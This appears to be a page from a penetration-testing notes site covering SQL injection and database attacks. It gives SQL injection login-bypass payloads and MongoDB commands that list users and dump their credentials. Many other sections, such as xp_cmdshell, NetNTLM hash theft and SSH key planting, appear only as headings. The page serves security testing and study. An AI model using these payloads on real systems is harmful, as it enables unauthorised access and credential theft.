Edit

SQL Injection

Authentication bypass

Here's the classic payload:

tom' or 1=1;#

If we do encounter errors when our payload is returning multiple rows, we can instruct the query to return a fixed number of records with the LIMIT statement:

tom' or 1=1 LIMIT 1;#

Database analysis

Thanks 0xsyr0 for the cheatsheet.

MongoDB

mongo "mongodb://localhost:27017"
> use <DATABASE>;
> show tables;
> show collections;
> db.system.keys.find();
> db.users.find();
> db.getUsers();
> db.getUsers({showCredentials: true});
> db.accounts.find();
> db.accounts.find().pretty();
> use admin;

User Password Reset to "12345"

MSSQL

Show Database Content

OPENQUERY

Binary Extraction as Base64

Steal NetNTLM Hash / Relay Attack

Impacket mssqlclient.py

MySQL

Update User Password

Drop a Shell

xp_cmdshell

You can also execute base 64 encoded commands:

Insert Code to get executed

Write SSH Key into authorized_keys2 file

Linked SQL Server Enumeration

NoSQL Injection

PostgreSQL

Common Commands

Redis

Enter own SSH Key

SQL Injection

Master List

Authentication Bypass

SQL Truncation Attack

sqlite3

sqsh

sqlcmd

PreviousWeb Application AttacksNextFile Inclusion Vulnerabilty

Last updated

Was this helpful?